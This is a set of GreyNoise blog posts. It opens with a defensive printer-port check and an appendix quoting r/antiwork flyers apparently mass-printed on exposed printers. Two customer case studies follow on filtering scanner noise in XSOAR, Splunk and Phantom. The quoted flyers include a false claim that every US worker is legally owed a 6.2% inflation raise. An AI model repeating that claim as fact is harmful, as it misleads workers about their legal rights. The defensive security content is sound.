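        with socket.create_connection((host, 9100), timeout=timeout):
            return True
    except OSError:
        return False

print(port_9100_open("203.0.113.25"))  # hypothetical public IP
```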

Learn more about GreyNoise and follow us on LinkedIn and Twitter.

APPENDIX: MESSAGES

GreyNoise has seen 29 variations of the same few messages, which you can read below or access via this Gist.

RIDDLE ME THIS


How can the McDonald's in Denmark manage
to pay their staff $22 an hour and still
sell a Big Mac for less than in America?

Answer: UNIONS!


Did you know that it is a rather
simple task to organize a UNION?


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------

ARE YOU BEING UNDERPAID?


You have a legal, protected right to discuss your pay with your coworkers.

This should be done on a regular basis to ensure that everyone is being paid fairly.

It is ILLEGAL for your employer to punish you for doing this.

If you learn that you are being paid less than someone else who is doing the same job,
you should demand a raise or consider quitting and finding a different job.

SLAVE WAGES only exist because people are willing to work for them.


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------

======================
NEW YEAR'S RESOLUTIONS
======================

1. Hit the Gym
2. Delete Facebook
3. ORGANIZE A UNION


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------
=========================
WHAT TO DO ON BREAK TODAY
=========================

1. Talk about your PAY
2. Talk about your RIGHTS
3. Begin ORGANIZING A UNION

GOOD employers are not afraid
of these, but ABUSIVE ones are.


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------
=====================
INFLATION WAGE NOTICE
=====================

Due to the 6.2% inflation rate,
all US workers are entitled to
at least a 6.2% pay adjustment.

We have received reports of
some ABUSIVE EMPLOYERS not
providing these adjustments.

If you have not received such a
raise, please ask your employer
why your PAY WAS CUT.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------

=========================
WHAT TO DO ON BREAK TODAY
=========================

1. Talk about your PAY
2. Talk about your RIGHTS
3. Begin ORGANIZING A UNION

GOOD employers are not afraid
of these, but ABUSIVE ones are.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------

TIME IS YOUR MOST VALUABLE ASSET.

Not only can you never obtain any
more of it, you do not even know
how much you have to begin with.

Why are you selling YOUR TIME
for SO LITTLE?

Join the "25 OR WALK" movement!

Tell your employer that YOUR TIME
is worth no less than $25 per hour,
and for them to call you when
they are ready to pay up.

But don't quit!

Make them fire you!
... and spend YOUR TIME with family
... and spend YOUR TIME with friends
... and rediscover YOUR favorite hobby
... and RECLAIM YOUR LIFE

SLAVE WAGES only existed because
people were willing to work for them.

BUT NOT ANYMORE.

THIS. ENDS. NOW.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------
HOW TO SCARE A SLAVE OWNER:

1. Talk about your PAY
2. Talk about your RIGHTS
3. Talk about FORMING A UNION

Employers are not scared of
these, but SLAVE OWNERS are.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------
==========================
ABUSIVE EMPLOYER CHECKLIST
==========================

[ ] Can't talk about PAY
[ ] Can't talk about RIGHTS
[ ] Can't talk about UNIONS
[ ] Punished for getting SICK
[ ] Punished for taking VACATION

If your employer checks ANY of
these, please contact support:

reddit.com/r/antiwork
----------------------------------------------------------
:::::::::::::::::::::::::::::::
::::: TIME IS :::::::::::::::::
::::::: YOUR MOST :::::::::::::
:::::::::: VALUABLE ASSET :::::
:::::::::::::::::::::::::::::::

Not only can you never
obtain any more of it,
you do not even know how
much you have to begin with.

LIFE IS SHORT!

Why are you selling YOUR TIME
for SO LITTLE?

Join the "25 OR WALK" movement!

Tell your employer that YOUR
TIME is worth no less than
$25 per hour, and for them
to call you when they are
ready to pay up.

But DON'T QUIT!

MAKE THEM FIRE YOU!

... and spend YOUR TIME
...... with FAMILY

... and spend YOUR TIME
...... with FRIENDS

... and rediscover YOUR
...... FAVORITE HOBBY

... AND RECLAIM YOUR LIFE

POVERTY WAGES only existed
because people were "willing"
to work for them.

BUT NOT ANYMORE.

THIS. ENDS. NOW.


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------

ARE YOU BEING UNDERPAID?


You have a legal, protected right to
discuss your pay with your coworkers.

This should be done on a regular basis to
ensure that everyone is being paid fairly.

It is ILLEGAL for your employer to punish
you for doing this.

If you learn that you are being paid less
than someone else who is doing the same
job, you should demand a raise or consider
getting fired and finding a better job.

SLAVE WAGES only exist because people are
willing to work for them.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------

==============
RIDDLE ME THIS
==============

How can the McDonald's
in Denmark pay their staff
$22 an hour and still manage
to sell a Big Mac for
less than in America?

Answer: UNIONS!


A GOOD UNION can easily
align everyone's goals.

Did you know that it
is a rather simple task
to organize a UNION?


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------

========================
ARE YOU BEING UNDERPAID?
========================

You have a protected LEGAL
RIGHT to discuss your pay
with your coworkers.

This should be done on a
regular basis to ensure that
everyone is being paid fairly.

It is ILLEGAL for your employer
to punish you for doing this.

If you learn that you are being
paid less than someone else who
is doing the same job, you
should demand a raise or
consider getting fired and
finding a better employer.

POVERTY WAGES only exist
because people are "willing"
to work for them.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------
RIDDLE ME THIS


How can the McDonald's in Denmark manage
to pay their staff $22 an hour and still
sell a Big Mac for less than in America?

Answer: UNIONS!


Did you know that it is a rather
simple task to organize a UNION?


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------
=====================
INFLATION WAGE NOTICE
=====================

Due to the 6.2% inflation rate,
all US workers are entitled to
at least a 6.2% pay adjustment.

We have received reports of
some ABUSIVE EMPLOYERS not
providing these adjustments.

If you have not received such a
raise, please ask your employer
why your PAY WAS CUT.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------
RIDDLE ME THIS


How can the McDonald's in Denmark manage
to pay their staff $22 an hour and still
sell a Big Mac for less than in America?

Answer: UNIONS!


Did you know that it is a rather
simple task to organize a UNION?


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------
========================
ARE YOU BEING UNDERPAID?
========================

You have a protected LEGAL
RIGHT to discuss your pay
with your coworkers.

This should be done on a
regular basis to ensure that
everyone is being paid fairly.

It is ILLEGAL for your employer
to punish you for doing this.

If you learn that you are being
paid less than someone else who
is doing the same job, you
should demand a raise or
consider getting fired and
finding a better employer.

POVERTY WAGES only exist
because people are "willing"
to work for them.


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------
==========================
ABUSIVE EMPLOYER CHECKLIST
==========================

[ ] Can't talk about PAY
[ ] Can't talk about RIGHTS
[ ] Can't talk about UNIONS
[ ] Punished for getting SICK
[ ] Punished for taking VACATION

If your employer checks ANY of these,
please contact support at:

reddit.com/r/antiwork

----------------------------------------------------------

TIME IS YOUR MOST VALUABLE ASSET.

Not only can you never obtain any
more of it, you do not even know
how much you have to begin with.

Why are you selling YOUR TIME
for SO LITTLE?

Join the "25 OR WALK" movement!

Tell your employer that YOUR TIME
is worth no less than $25 per hour,
and for them to call you when
they are ready to pay up.

But don’t quit!

Make them fire you!
... and spend YOUR TIME with family
... and spend YOUR TIME with friends
... and rediscover YOUR favorite hobby
... and RECLAIM YOUR LIFE

SLAVE WAGES only existed because
people were willing to work for them.

BUT NOT ANYMORE.

THIS. ENDS. NOW.


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------

TIME IS YOUR MOST VALUABLE ASSET.

Not only can you never obtain any
more of it, you do not even know
how much you have to begin with.

Why are you selling YOUR TIME
for SO LITTLE?

Join the "25 OR WALK" movement!

Tell your employer that YOUR TIME
is worth no less than $25 per hour,
and for them to call you when
they are ready to pay up.

But don’t quit!

Make them fire you!
... and spend YOUR TIME with family
... and spend YOUR TIME with friends
... and rediscover YOUR favorite hobby
... and RECLAIM YOUR LIFE

SLAVE WAGES only existed because
people were willing to work for them.

BUT NOT ANYMORE.

THIS. ENDS. NOW.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------


HOW TO SCARE A SLAVE OWNER:

1. Talk about your PAY
2. Talk about your RIGHTS
3. Talk about FORMING A UNION

Employers are not scared of
these, but SLAVE OWNERS are.


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------
======================
NEW YEAR'S RESOLUTIONS
======================

1. Hit the Gym
2. Delete Facebook
3. ORGANIZE A UNION


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------

HOW TO SCARE A SLAVE OWNER:

1. Talk about your PAY
2. Talk about your RIGHTS
3. Talk about FORMING A UNION

Employers are not scared of
these, but SLAVE OWNERS are.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------

ARE YOU BEING UNDERPAID?


You have a legal, protected right to
discuss your pay with your coworkers.

This should be done on a regular basis to
ensure that everyone is being paid fairly.

It is ILLEGAL for your employer to punish
you for doing this.

If you learn that you are being paid less
than someone else who is doing the same
job, you should demand a raise or consider
quitting and finding a different job.

SLAVE WAGES only exist because people are
willing to work for them.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------
:::::::::::::::::::::::::::::::
::::: TIME IS :::::::::::::::::
::::::: YOUR MOST :::::::::::::
:::::::::: VALUABLE ASSET :::::
:::::::::::::::::::::::::::::::

Not only can you never
obtain any more of it,
you do not even know how
much you have to begin with.

LIFE IS SHORT!

Why are you selling YOUR TIME
for SO LITTLE?

Join the "25 OR WALK" movement!

Tell your employer that YOUR
TIME is worth no less than
$25 per hour, and for them
to call you when they are
ready to pay up.

But DON'T QUIT!

MAKE THEM FIRE YOU!

... and spend YOUR TIME
...... with FAMILY

... and spend YOUR TIME
...... with FRIENDS

... and rediscover YOUR
...... FAVORITE HOBBY

... AND RECLAIM YOUR LIFE

POVERTY WAGES only existed
because people were "willing"
to work for them.

BUT NOT ANYMORE.

THIS. ENDS. NOW.


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------
ARE YOU BEING UNDERPAID?


You have a legal, protected right to
discuss your pay with your coworkers.

This should be done on a regular basis to
ensure that everyone is being paid fairly.

It is ILLEGAL for your employer to punish
you for doing this.

If you learn that you are being paid less
than someone else who is doing the same
job, you should demand a raise or consider
getting fired and finding a better job.

SLAVE WAGES only exist because people are
willing to work for them.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------

==========================
ABUSIVE EMPLOYER CHECKLIST
==========================

[ ] Can't talk about PAY
[ ] Can't talk about RIGHTS
[ ] Can't talk about UNIONS
[ ] Punished for getting SICK
[ ] Punished for taking VACATION

If your employer checks ANY of
these, please contact support:

reddit.com/r/antiwork
----------------------------------------------------------



ARE YOU BEING UNDERPAID?


You have a legal, protected right to
discuss your pay with your coworkers.

This should be done on a regular basis to
ensure that everyone is being paid fairly.

It is ILLEGAL for your employer to punish
you for doing this.

If you learn that you are being paid less
than someone else who is doing the same
job, you should demand a raise or consider
getting fired and finding a better job.

SLAVE WAGES only exist because people are
willing to work for them.


Learn More:
=====================
reddit.com/r/antiwork
====================

----------------------------------------------------------



==============
RIDDLE ME THIS
==============

How can the McDonald's
in Denmark pay their staff
$22 an hour and still manage
to sell a Big Mac for
less than in America?

Answer: UNIONS!


A GOOD UNION can easily
align everyone's goals.

Did you know that it
is a rather simple task
to organize a UNION?


Learn More:
=====================
reddit.com/r/antiwork
=====================

XSOAR Incident Response in the SOC with GreyNoise

You’re in a dark room, and your screen is crawling with alerts from your IDS/IPS about an IP address trying an exploit on one of your internet-facing devices. You scramble to investigate the event, checking VirusTotal, IPinfo, Whois, and even Google to try to figure out how dangerous the IP might be, only to discover after an hour that it's actually just Shodan… or Censys… or Pingdom… or a brain-dead bot script.

GreyNoise recently met with Robert*, Manager of Cybersecurity Incident Response & Operations at a large food service & hospitality company. Robert lives this reality every day as he and his Incident Response team respond to network events from their MSSP and internal detections. Recently Robert found a way to leverage GreyNoise Intelligence data integrated into Cortex XSOAR incident response to help his team answer these questions much more quickly and effectively. We caught up with Robert to learn how he had done it.

* Customer names have been changed to maintain anonymity

Using GreyNoise to prioritize threats with XSOAR Incident Response

GreyNoise (GN): Thanks for joining us, Robert. Tell us a bit about your background?

Robert: Sure — I lead the incident response and security operations team at my company. I've been here for about six years and was previously an individual contributor on a joint team that combined security engineering, incident response, and security operations.

A few years ago, we figured it probably doesn't make sense to keep this one giant team, and it would be nice to start developing some specialization. So we chunked the team into two groups — a security engineering team, and an incident response and security operations team. I was fortunate to be selected to run the new IR and Ops team, and I’ve been doing it for about two years now.

GN: Can you tell us more about what your teams are responsible for and how you work?

Robert: We work with several external partners that triage alerts for us, as well as conduct our own custom detections and investigations. We actually have four different alert classifications:

  • User reported - these are things like suspected phishing emails, where an end-user is sending something to us.
  • Partner alerts - we've got three major partners that look at events and raise alerts to us:
  1. EDR/endpoint incidents
  2. Cloud-native and SaaS type incidents
  3. Traditional IPS/IDS incidents raised by our MSSP (these partners will raise alerts in their ticketing system, and then these get mirrored into our SOAR system for us to look at)
  • Black box alerts - we use a number of products internally, including things like AWS Guard Duty and Microsoft Cloud App Security, where we get alerts. We also process alerts based on our traditional AV signatures.
  • Custom detections - these are detections that we're doing through our SIEM or other tools where we specifically want to look for something.
Figure: GreyNoise XSOAR Incident Response Quadrant

So basically, we use our MSSP partner as Tier 1 analysts, with my teams handling Tier 2 and above. We're not a 24x7 shop, so we push 24x7 monitoring of our assets to our partners, basically saying, “Here's your escalation plan during business hours; here's your escalation plan outside of business hours. Go get them.”

Once we get an alert through any of these sources, we'll do triage, and beyond the initial triage, we’ll do remediation, and then resilience. Any kind of gaps that we have in those tools, we supplement with our own detections, or if it's a use case that’s specific to the company, we'll do it internally as well.

GN: What was it that drew you to GreyNoise?

Robert: I remember seeing Andrew [Morris, founder and CEO of GreyNoise] talking about it on Twitter, and I checked it out and thought, wow, this is really awesome. I think the biggest sort of “aha” for me was looking at the amount of time it could save me during an investigation.

What was happening quite often to us was that we would get these IDS/IPS alerts about an exploitation attempt. And we’d have to run the alerts to the ground, and it was taking forever.

I realized, looking at GreyNoise, that this tool would tell me if this is a targeted attack or if it’s a piece of automation that some attacker is using to try to build their botnet. Because if it's an automated attack, and the script fails even slightly, then the whole attack is probably a wash at that point. There's not an operator with hands-on-keyboard to make the adjustments needed, so the automation just fails and moves on to the next IP.

Having that kind of insight was a game-changer for us in how we analyzed those alerts and how we looked at that type of attack surface. So we started using the Community edition of GreyNoise with our old homegrown incident response tool to query things, and it was tremendously helpful.

For example, one of the things we were looking at was vulnerability scans. If we’re getting vulnerability scanned by somebody who’s scanning everybody else too, okay, welcome to the Internet. But if somebody’s scanning us that GreyNoise has never heard of, that's interesting — why are they just scanning us? Are we being targeted? GreyNoise majorly short-cycled a lot of investigations on these kinds of events.

Another example, we would see somebody slinging an Apache Struts exploit. Okay, are they doing this just to us, or are they doing this to everybody? And again, that kind of changed the dynamic of how we responded to that event.

GN: How are you using GreyNoise today?

Robert: A while back, we started to look at various SOAR platforms, and I ended up doing evaluations of what was then Demisto (it’s Cortex XSOAR now), Splunk Phantom, Swimlane, and Siemplify. I engaged with the vendors, downloaded the software, ran an evaluation environment, and actually kicked the tires on each of them. Ultimately we landed on XSOAR, and that started the clock of bringing things over from our existing incident response queue.

As we started to bring events into XSOAR, particularly the ones where we had been using GreyNoise, I realized there was a great opportunity to integrate GreyNoise into XSOAR to automate the process. I went to my director and made the case that we've been using this tool called GreyNoise, and it's super helpful. Now that we've got these events coming from our MSSP into XSOAR, we could start leveraging automation to query GreyNoise, instead of having to manually copy the IP, open up a new tab, paste it in and run a search.

I had been talking to Andrew a fair amount on Twitter, and he sent me over an integration between GreyNoise and XSOAR (there was no marketplace at the time), and it worked really well. So we signed up for a paid plan with GreyNoise to get more IP lookups and more context information. We now use GreyNoise on most of our network detection-based alerts to give context and alleviate a lot of strain from a research perspective on those events. So it's been great.

The way we’ve integrated GreyNoise into XSOAR is that any time we see an IP address, XSOAR invokes the IP enrichment command for every integration that supports it. This includes GreyNoise, VirusTotal, IPinfo.io, whatever. It'll run them all, bring all that data back, and show it to the analyst. One of the areas where GreyNoise is really useful with this approach is inside of our playbook for the IDS/IPS alerts from our MSSP.
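For readers who want to see what that enrichment looks like outside of XSOAR, here is a minimal sketch against the public GreyNoise Community API endpoint; the field names reflect our reading of the public docs and should be verified against the current API reference.

```python
# Single-IP lookup against the GreyNoise Community API. Field names
# (classification, name, noise, riot) are assumptions based on the public docs.
import requests

def greynoise_community_lookup(ip, api_key=None):
    headers = {"Accept": "application/json"}
    if api_key:
        headers["key"] = api_key  # API key header per the GreyNoise docs
    resp = requests.get(
        f"https://api.greynoise.io/v3/community/{ip}", headers=headers, timeout=10
    )
    return resp.json()

info = greynoise_community_lookup("8.8.8.8")
print(info.get("classification"), info.get("name"), info.get("noise"), info.get("riot"))
```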

In addition to alerts coming from our MSSP, we do custom detections in our SIEM, Splunk Enterprise Security. So while we will write content in Splunk, and raise these as notable events in ES, all of the results get mirrored into XSOAR. We try to make XSOAR the “one-stop-shop” for every event that we’re working.

GN: What are some of the top use cases where you are getting value from GreyNoise?

Robert: Just being able to tell the background noise of the Internet, that was huge for us and made us go “wow.” To see that this activity is just a consequence of being online, but that activity over there GreyNoise hadn't seen, so they're only paying attention to us, and it actually merits us looking into more deeply because they're not just slinging exploits or vulnerability scans at every IP address on the Internet. And we've also seen the opposite, where we see yes, they are a benign scanner, and it's Shodan, cool, we can ignore it.

Because GreyNoise is good at providing context around what IPs are doing in the broader Internet, it typically plays a lot with the IDS/IPS stuff that our MSSP handles — the primary data that we pivot off of for these events is the IP address. We also use GreyNoise on an ad hoc basis — for example, if I see a weird IP on a login to our identity provider, I’ll look it up in GreyNoise and see if it does anything funky on the Internet. And so it's often just helpful context.

Another use case that’s been really helpful is the new RIOT tagging, which identifies known legitimate traffic. For example, if I'm doing an investigation on a host that's been compromised and I've got a list of IPs it's talked to in the last 24 hours, I just want to rip out all the stuff that is legitimate, like Office 365 or Slack or cloud solutions that our users should be talking to. I can go to the analysis page on GreyNoise and just drop this big block of IPs in there, and it will tell me if any of these are ones that I should really be caring about, and help me eliminate the ones that I don’t. It gives me a good way to filter for a first pass — I can rule this stuff out for now and focus on what's left. Then if I still can't find anything, I can go back to the Office 365 IP and look for anomalies there. Because if there's an Eastern European IP address buried in amongst the Office 365 ones, I know which one I want to look at first.
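A rough sketch of that first-pass filter, using the same Community API endpoint (the riot and classification fields are our assumption from the public docs, and the IP list is a placeholder):

```python
# Keep only the contacted IPs that are neither RIOT (common business services)
# nor classified as benign; those are the ones worth an analyst's time.
import requests

def is_ignorable(ip):
    resp = requests.get(f"https://api.greynoise.io/v3/community/{ip}", timeout=10)
    data = resp.json() if resp.ok else {}
    return bool(data.get("riot")) or data.get("classification") == "benign"

contacted = ["203.0.113.10", "198.51.100.99"]          # hypothetical "talked to" list
worth_a_look = [ip for ip in contacted if not is_ignorable(ip)]
print(worth_a_look)
```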

GN: How do you think about the “opportunistic scanners” you see through GreyNoise?

Robert: Every time we find an IP that GreyNoise knows about, we ask ourselves, “Hey, is this IP trying to exploit CVE fill-in-the-blank here? Do we run that software? No? OK, done.” Because it's an opportunistic scanner, and GreyNoise is saying the IP is focused on this particular CVE, or it loves these six CVEs for this product suite. This allows us to conclude that, because we don't use that product suite, we're good, and we can ignore it.

Alternatively, the answer might be, “yes, we do use that product suite.” In that case, I’ll go read about the CVE and see what versions are vulnerable, and then look at our system and see if it’s something we need to dig into or whether we already patched for it.

As part of our triage, we also check in with our vulnerability management team. If we see a scanner out on the Internet scanning through our IPs, we’ll go dig up our internal scan results for the same IP and see what we found. Because we can pretty much know that anything we found, the bad guys just did too.

There’s some nice visibility we get with GreyNoise around vulnerability scans. For example, for events that we get, we can look at our firewall and easily see that this particular IP scans all of these public IPs. Then we can check in GreyNoise to see, what ports does this scanner like to scan? We obviously know they scan port 80 because that's why we're here. But do they scan 443 (SSL)? Recently Andrew tweeted about some new behavior GreyNoise tracks: whether scanners follow 301 or 302 redirects.

Say we determine that this IP only scans port 80 — cool. Now we can go into XSOAR and CURL all of the IPs that they scanned on port 80 and check to see if there’s a common vulnerability they might be looking for. Or do we get our load balancer telling them they need to go to 443? Because if we get that, and this IP doesn’t follow redirects, and this IP doesn't scan 443, then he's hitting a load balancer appliance, and I don't care. In XSOAR, that playbook will close the event if this is the condition that's met. And no analyst ever has to interact with this event.
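That redirect condition can be sketched outside of XSOAR as follows, assuming a list of IPs pulled from firewall logs (placeholders here) and checking for a 301/302 to HTTPS without following the redirect:

```python
# Request each scanned IP on port 80 without following redirects and record
# whether it simply bounces clients to HTTPS (the "load balancer" case).
import requests

scanned_on_80 = ["203.0.113.15", "203.0.113.16"]       # hypothetical targets

for ip in scanned_on_80:
    try:
        resp = requests.get(f"http://{ip}/", allow_redirects=False, timeout=5)
        location = resp.headers.get("Location", "")
        bounced_to_https = resp.status_code in (301, 302) and location.startswith("https://")
        print(ip, resp.status_code, bounced_to_https)
    except requests.RequestException as exc:
        print(ip, "error:", exc)
```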

Figure: Three Types of Mass-Internet Scanning

GN: What kind of impact has GreyNoise had on your business — can you share any results?

Robert: I remember first seeing Andrew talking about GreyNoise on Twitter. When I checked it out, I thought, wow, this is really awesome. I think the biggest sort of “aha” for me was looking at the amount of time it could save me during an investigation.

We started using the GreyNoise Community edition with our old homegrown incident response tool, and it was tremendously helpful. That experience allowed me to go to my director and make a case for leveraging automation to query GreyNoise, instead of having to manually copy the IP, open up a new tab, paste it in and run a search. Today we use GreyNoise on most of our network detection-based alerts, and to enrich every event we get from our MSSP. I would estimate that GreyNoise is saving us probably an hour of work every time we get one of these vulnerability scan events — we’ve automated our approach completely, so an analyst doesn’t even have to touch it (and we see around 8-10 of these events every week). So long story short, GreyNoise really does shorten the cycle of some of these vulnerability scan investigations and is saving us about 40 hours per month that we can apply to other high-priority security problems.

I’m also getting some good value out of using GreyNoise for ad hoc investigation context help — for example, when I've got a bunch of IPs and I just want to filter out the ones that I don't need to care about. We use GreyNoise to give context and alleviate a lot of strain from a research perspective on those events. So it's been great.

Curious how GreyNoise can save your SOC time? Try the product for free.

Get Started With GreyNoise For Free

A Thank You to SOC Analysts

Wednesday, October 20, 2021, is the first ever SOC Analyst Appreciation Day™ - and in our opinion, it couldn’t have come sooner! We’d like to acknowledge the hard work and dedication of all the SOC analysts who help defend institutions across the globe. Thank you.

A SOC analyst’s life can be frustrating and stressful, with the weight of your organization’s security on your shoulders. Our goal here at GreyNoise is to help make your life easier by increasing SOC analyst efficiency, and by telling teams what not to worry about. We do this by helping you filter out “noisy” alerts associated with opportunistic internet scanning or common business services, not targeted threats. SOC teams can access GreyNoise data through our web-based Visualizer, via our API (REST, SDK, or CLI), or by integrating directly with their security tech stack.

If you’re a SOC analyst or manager interested in learning more about how you can use GreyNoise:

  1. Reach out to community@greynoise.io to get free access to GreyNoise Enterprise for 1 month.
  2. Check out the following resources:

Case Study: Hurricane Labs

  • How Hurricane Labs Reduces Noisy Alerts in Splunk and Phantom Using GreyNoise

How I Use GreyNoise

  • Session II: Paul Misner & Grant Lorello, SecuLore (MSSP Provider)

How Hurricane Labs Reduces Noisy Alerts in Splunk and Phantom Using GreyNoise

Imagine this scenario: You’re running a security operations center, and your team is processing a bunch of alerts coming out of Splunk Enterprise Security. As you add new detections and log sources, the volume of alerts begins to rise, your analysts start to get overwhelmed, and that familiar alert fatigue starts to kick in. Your security engineering team jumps in with yet another cycle of tuning to get the alert volumes back down to manageable levels. Then the cycle starts all over again...

Hurricane Labs lives this reality every day as a managed services provider that is 100% focused on Splunk and Phantom. The company manages these platforms for customers, providing 24x7 monitoring services supported by a team of Splunk ninjas to handle the heavy lifting.

Recently the Hurricane team found a way to leverage GreyNoise Intelligence data to identify the noise in Splunk and Phantom alert traffic, reducing the load on their analysts by 25%.

We had the good fortune to chat with Hurricane Labs Director of Managed Services, Steve McMaster, to learn how the company had done it.

GreyNoise: Thanks for joining us, Steve. Perhaps we could start off with a bit of your background - how did you get started with Hurricane Labs?

STEVE MCMASTER: Sure - to set the stage, we manage Splunk and Phantom deployments for our customers, running the gamut from infrastructure management, to search and SPL creation, to security analysis and alerting, to rapid incident response. As part of these services, we provide 24x7 security monitoring, and I oversee the two teams that deliver this service. I’ve been with Hurricane for almost 14 years at this point - it's actually the only job I've ever had. I started here at age 17, right out of high school, and along the way, I've done a little bit of everything.

GN: What kind of challenges were you and your teams at Hurricane facing around managing security alerts?

STEVE MCMASTER: We process a high volume of alerts on behalf of our customers, and as part of this traffic, we often see a lot of noisy alerts. This includes everything from known benign scanners (such as Shodan) to what we call "internet background noise," scanners that are constantly scanning the internet as a whole, looking for things to poke at.

The alert volumes we see are a constant ebb and flow, and we spend a lot of time tuning our customers’ environments to turn down the noise to a manageable level. But then, as we add new customers and more detections, the alert volumes start to creep back up. That’s when we see our analysts getting overwhelmed and feeling alert fatigue. It’s a normal cycle for our business: alert volumes go up, and then we need to dig in and tune our implementations to bring the volumes back down.

GN: What was it that drew you to GreyNoise?

STEVE MCMASTER: We were starting a new cycle of tuning to get alert volumes to come back down when I stumbled on Andrew [Morris, GreyNoise founder]. I saw my boss and Andrew exchanging views on Twitter, and I thought, “Who is this guy, and why does the stuff he’s saying make so much sense?” So I took a look at the GreyNoise product.

I have to say, I’ve always been a big skeptic of threat intelligence as an industry because once enough people know about a piece of intelligence to publish it for general consumption, it’s already burned infrastructure. Yes, you might find some threats with it, but it's not worth the $150K per year that they charge for it.

But GreyNoise was different. I always refer to GreyNoise now as “anti-threat intelligence.” It’s specifically the opposite of traditional threat intelligence. Instead of saying, “pay attention to this,” GreyNoise says, “STOP paying attention to this; go spend your time on other things.”

So this approach fit into an argument I was having with our customers a lot at the time - my point was that the things that you’re detecting are not actionable. They’re not targeted at you; they’re not somebody trying to exploit you; they’re JUST scanning the internet. So you shouldn’t worry about them or spend time on them.

Shodan makes a really good example of this, because Shodan is scanning everybody and showing up in a lot of alerts. But this is not something YOU need to care about, Mr. Customer; therefore, it's not something WE need to care about as part of our monitoring service. The problem is that this is really hard to quantify. You can show people that alerts from Shodan should be ignored — that's easy, but trying to identify broader Internet background noise was a lot harder to do. To be able to say, “Okay, we've seen this thing across our 40 customers, so let’s ignore it,” that's not really enough scale to be able to make this conclusion definitively.

And then along came this guy who had a product that did exactly that. So GreyNoise let us expand our service in a way that customers kind of already expected from us. Now we could say, “Look, this is opportunistic, this is generalized, this is global, this is not targeted.” And we could say this definitively because of the scale at which GreyNoise operates.

And it really just happened to fit at a time when that was a problem we were trying to tackle with our customers.

GN: So now, fast forward, how are you using GreyNoise with Splunk and Phantom today to deliver on this promise of “reducing the noise?”

STEVE MCMASTER: We’re using GreyNoise in two ways - we use the data inside Splunk to eliminate alerts before they ever get to us, and then we do enrichment of alerts in Phantom once they reach us. We integrate the GreyNoise data into these environments using pre-built integrations that we initially developed, although we have turned these over to GreyNoise to maintain and extend for all their customers.

Our goal with these integrations is that if the IP address is in GreyNoise, then we eliminate it from alerting. GreyNoise actually returns three basic categories of “noise” (a minimal triage sketch follows the list):

  1. an IP can be “known benign,” which is something I don't have to care about;
  2. any IP identified as “known malicious” is something I should be automatically blocking at the edge;
  3. and anything else (“unknown”) is when I want to stick a person on it to see what actually happened and what impact it had.
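As referenced above, here is a minimal sketch of that three-way mapping, assuming classification strings follow the benign/malicious/unknown convention; wiring the result into Splunk or Phantom is left to the respective integrations.

```python
# Map a GreyNoise classification to the triage action described above.
def triage_action(classification):
    if classification == "benign":
        return "suppress"              # known benign scanner: drop the alert
    if classification == "malicious":
        return "block-at-edge"         # candidate for automatic edge blocking
    return "escalate-to-analyst"       # unknown: a human should take a look

for c in ("benign", "malicious", "unknown"):
    print(c, "->", triage_action(c))
```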

The reality is that some customers are not totally comfortable with the accuracy of these classifications (at least at first), so for some customers, we still raise a low-priority alert so they can have a human look at it. I think that this comes down to trust, and based on OUR experience, if GreyNoise is confident the IP address is a scanner, then we are happy to ignore it. I would say about two-thirds of our customers are there today.

I’m also really excited about something Andrew mentioned at the last Open Forum conference GreyNoise held, the new RIOT service. Instead of identifying internet scanner “noise,” RIOT looks at the flip side of this by identifying the “known good,” common business services that everyone uses, like Slack or Office365, or Google IP addresses. So now we can easily tell the difference between a legitimate service like a Microsoft update and a "not legitimate" service like a malware download.

GN: Could you give us some more detail on how the implementations work?

STEVE MCMASTER: Sure, so when we use GreyNoise to filter noisy alerts out of Splunk, we use the GreyNoise-Splunk integration. We install that in our customers' Splunk environments and add it to the search language for various detections. The logic is straightforward: if something in the search results matches GreyNoise, it gets excluded.

More specifically, we apply GreyNoise to any correlation search or detection inside of Splunk that we think is relevant. The big ones are IDS events and Splunk’s vulnerability scanner detection rules; those are the main ones that we use it for.
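The real exclusion happens at search time via the GreyNoise-Splunk integration; this hypothetical Python sketch only shows the shape of the logic, not the SPL itself:

```python
# Hypothetical stand-in for the search-time exclusion described above.
# In production this is done in Splunk's search language; the lookup here
# is a placeholder you would wire to the GreyNoise API or a cached feed.

alert_source_ips = ["198.51.100.7", "203.0.113.9", "192.0.2.55"]

def is_noise(ip: str) -> bool:
    """Placeholder for a GreyNoise lookup."""
    known_noise = {"198.51.100.7"}  # e.g. a known benign scanner
    return ip in known_noise

# Alerts whose source IP is known internet noise never reach an analyst.
actionable = [ip for ip in alert_source_ips if not is_noise(ip)]
print(actionable)  # -> ['203.0.113.9', '192.0.2.55']
```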

